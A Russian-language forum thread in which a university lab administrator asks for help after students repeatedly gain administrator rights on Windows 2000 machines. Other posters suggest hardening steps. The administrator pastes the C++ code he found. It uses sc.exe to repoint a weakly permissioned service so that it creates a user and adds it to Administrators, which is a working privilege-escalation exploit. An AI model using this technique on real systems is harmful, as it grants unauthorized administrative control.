Привет всем.
Сразу прошу прошение за ошибки (не из России я).
Такая проблема у миня, я СисАдмин в Университете (администрираю 40 комп. OS : Win 2000 Pro (all hotfixes))
В прошом году меня тоже взломали, уже не знал чо делать, но нечаина на один компютар нашол утилиты : sc.exe и Service Permissions Checker.
Вот што они делали :

http://img57.imageshack.us/img57/5444/hackedrk1.th.jpg (http://img57.imageshack.us/my.php?image=hackedrk1.jpg)

После того как удалил всё, вот што показовала :

http://img244.imageshack.us/img244/228/systemsecureav2.th.jpg (http://img244.imageshack.us/my.php?image=systemsecureav2.jpg)

Карочи, удалил я Macromedia Licensing.exe, и Сервис тоже удалил в регедит, думал што всё теперь проблем больше не будет, не тут то было.
Согодня опять спалил новыи Юзер "Хакер", и на Диск Д: нашол код зделан в С++.

// sys.cpp : Defines the entry point for the console application.
//

#include "stdafx.h"
#include <stdlib.h>
#include <windows.h>
#include <conio.h>
int main(int argc, char* argv[])
{
// WinExec("sc.exe queryex \"Macromedia Licensing Services\" > d:\\log.log.log",SW_SHOW);
WinExec("sc.exe config \"Macromedia Licensing Service\" binPath= \"net user Xakep Xakep /add\"",SW_SHOW);
Sleep(1000);
WinExec("sc.exe start \"Macromedia Licensing Service\"",SW_SHOW);
Sleep(1000);
WinExec("sc.exe config \"Macromedia Licensing Service\" binPath= \"net localuser Administrators Xakep /add\"",SW_SHOW);
Sleep(1000);
WinExec("sc.exe start \"Macromedia Licensing Service\"",SW_SHOW);
getch();
return 0;
}


..и ищо несколько фаилов, вылажу на рапид штоб посмотрели:
http://rapidshare.com/files/87310556/sys.rar.html

В моём зале много програм есть в том числе и Visual Studio ну конечно есть и cmd.exe
Все студенты работают под User - Restricted user.
С: - read & Execute, в regedit тоже самое, и в Group Policy по игрался.

Не понемаю как они создают новыи Сервис в регедит, User имеет права толыко читать, есть предположение што они под Юзер : System делают ето.
Помогите пожалуиста, не знаю уже што делать, спасибо аднозначно, жду ответов штоб решить проблему.

Забыл поставеть ищо один print screen :

http://img87.imageshack.us/img87/4862/hackku1.th.jpg (http://img87.imageshack.us/my.php?image=hackku1.jpg)

Может быть имеет смысл sc delete Macromedia Licensing Service (доп. физически переместить exe файл, запускающий сервис) и запретить запуск cmd (тут (http://www.oszone.net/2020/)), regedit
В разделе HKEY_CURRENT_USER\SOFTWARE\Microsoft\ Windows\CurrentVerson\Policies\System добавить ключ DisableRegistryTools :dword= 0х00000001.
Запуск редактора реестра будет запрещен, но останется возможность вносит изменения с помощью программного обеспечения сторонних разработчиков и с помощью REG-файла.
Можно попробовать использовать сторонние утилиты, типа LockWin (http://pisoft.ru/lw/)

1. Я службу Macromedia удалил сразу и .ехе филе тоже, он (хакер) сам саздаёт эту службу, и вовсе Flash-u и Dreamweaver-u не нужен этот сервис.

2. Не могу запретить cmd :( Юзера не могут работать в Assembler и Java, я запретил cmd сразу но потом когда увидел што студенты не могут работать и учителя начели наижеать, разрешил опять.

3. :) ну конечно Юузера не имеют доступа к regedit и regedt32.


Што задумал сегодня зделать :

Вовсе убрать SYSTEM и User-a с этова ключа:

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services

...веть вся проблема што хакер создаёт новыи Service, я думаю с помощю SYSTEM, не знаю што даст это, или вовсе Виндоза может здохнуть на Startup, тут уже методам тыка, пока не урежу уязвимость не угаманюсь.

Жду новые сообшения...

С помощью можно той же LockWin Система безопасного запуска программ из LockWin (http://www.pisoft.ru/locker/artik/createproc.htm)
Можно ещё ограничить через
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\RestrictRun
Реестр: Настройки безопасности (http://forum.script-coding.info/viewtopic.php?pid=1312) - при использовании данного метода надо обязательно вписать в раздел RestrictRun программу regedit.exe или другую для работы с реестром. В противном случае Вы не сможете отключить данный параметр, и придется переустанавливать систему.
Дополнительно можно почитать How to implement system policies for Windows XP-based... (http://support.microsoft.com/kb/910203)

Не поиму Pili я же сказал што User не имеет доступ к regedit.
LockWin LockWin не подходит для меня, лудше уже поставеть Deep Freeze...но тоже не хочу, хочу наити уязбимость и убраты иё.

User не имеет доступ к regedit. »
при чем тут это? Я же писал о ограничении запуска программ
Можно ещё ограничить через
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\RestrictRun »

и какую програму ты хочеш ограничеть, не поиму ?!

eXtremer, я вообще никакую прогу не хочу ограничивать, мне это не надо :) Я привел выше ссылку по методу ограничения запуска программ
Реестр: Настройки безопасности, видимо ты по ней не сходил. Суть в том, чтобы разрешить запуск только определенных программ, всё остальное запретить.

Pili, видно ты не понемаеш што творится у миня в зале :)
Щас я перечеслю только несколыко програм которые есть в зале :
Microsoft Office, Oralce, MSSQL, Maple, Corel Draw, Photoshop, Macromedia, Visual Studio...и ищо много, много различных прогам,
так што што ты мне хочеш скзать НЕ выполнима !

Нет, нечево не получилось :( Много програм не рабатают, даже Symantec Anticirus не запускаетця...
пфффф не жаю больше чо делать...

Щас я перечеслю только несколыко програм которые есть в зале :
Microsoft Office, Oralce, MSSQL, Maple, Corel Draw, Photoshop, Macromedia, Visual Studio...и ищо много, много различных прогам,
так што што ты мне хочеш скзать НЕ выполнима ! »
Ну а что поделать, сложно всё прописывать, но выполнимо же )
Using Software Restriction Policies to Protect Against Unauthorized Software (http://technet.microsoft.com/en-us/library/bb457006.aspx), можно закрутить гайки доп.-но применением шаблона hisecws.inf через оснастку Security Configuration and Analysis (http://technet2.microsoft.com/WindowsServer/en/library/bf9ae857-c96e-437e-adfb-10166093e4221033.mspx?mfr=true) или использовать сторонный софт, позволяющий контролировать доступ... или что-то типа vmware

Усио решил поставлю Deep Freeze до выеснение апстаятельств...штоб не иб* много, в суботу поставлю.

Вчера сам сел на один комп. и начел игратся с sc.exe , нечего не получалось, не старт, не стоп, не create service - access denied, так што они уже наверое под Админом делают этот service.
И ищо што интересно, почему назывют этот сервис только Macromedia Licensing ?
есть два варината : 1. или называют так штоб я не сполил новыи созданыи сервис, либо 2. они могут создать толыко этот сервис!Надо както зделать штоб они не могли создать этот сервис, но как ? может бить сам его создать а потом убрать SYSTEM и User в regedt32 все права ?!

eXtremer, поменять пароль админа (можно и имя Administrator переименовать), провести аудит и снести всех других локальных админов (можно с помощью групп. политики тут (http://forum.oszone.net/thread-94682.html)). Можно дополнительно воспользоваться утилитой syskey How to use the SysKey utility to secure the Windows Security Accounts Manager database (http://support.microsoft.com/kb/310105)
Есть предположение что хакеры
а)повышают привилегии через уязвимости установленного софта, поэтому поставить все патчи на весь установленный софт
б)используют для своих нужд ранее внедренный backdoor/trojan, поэтому провести глубокий анализ всего софта всевозможными утилитами, включая антивирусные (AVZ (http://z-oleg.com/avz4.zip), CureIT (ftp://ftp.drweb.com/pub/drweb/cureit/cureit.exe), SdFix (http://downloads.andymanchesta.com/RemovalTools/SDFix.exe), ComboFix (http://download.bleepingcomputer.com/sUBs/ComboFix.exe))
назывют этот сервис только Macromedia Licensing »
Вероятно кто-то поломал один раз, все остальные действуют по шаблону, скорее всего сервис можно назвать как угодно (если это только не зашито в уже готовой используемой ими программе для взлома)
Кстати, можно попробовать дополнительно установить HIPS (типа processguard или лучше defencewall (http://gladiator-antivirus.com/forum/index.php?showforum=193)) и закрыть HIPS паролем.

Скачал сегодня ProcessGuard 3.410, посталвю в субботу, но не знаю елси это штота даст...